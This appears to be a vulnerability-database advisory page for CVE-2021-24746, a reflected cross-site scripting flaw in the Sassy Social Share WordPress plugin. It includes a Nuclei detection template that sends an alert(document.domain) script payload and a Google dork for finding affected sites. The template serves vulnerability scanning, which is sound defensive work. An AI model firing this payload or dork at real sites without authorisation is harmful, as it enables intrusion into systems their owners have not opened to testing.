CVE-2021-24746: WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress Sassy Social Share Plugin | POC: 已公开

漏洞描述

WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability.

PoC代码[已公开]

id: CVE-2021-24746

info:
  name: WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting
  author: Supras
  severity: medium
  description: WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update the WordPress Sassy Social Share Plugin to version 3.3.40 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/99f4fb32-e312-4059-adaf-f4cbaa92d4fa
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24746
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24746
    cwe-id: CWE-79
    epss-score: 0.04002
    epss-percentile: 0.88
    cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: heateor
    product: sassy_social_share
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/sassy-social-share"
  tags: cve,cve2021,wordpress,wp-plugin,xss,wp,wpscan,heateor

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/posts"
      - "{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '?a"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: slug
        group: 1
        regex:
          - '"slug":"([_a-z-A-Z0-9]+)",'
        internal: true
        part: body
# digest: 4b0a00483046022100de7c336bf776fcfd5ac23e5de8263750915f928dec7b2d51360592a33f65b331022100f77712d8705aec62babbb644784498263a82eee76823635c109a796e1c623cd4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐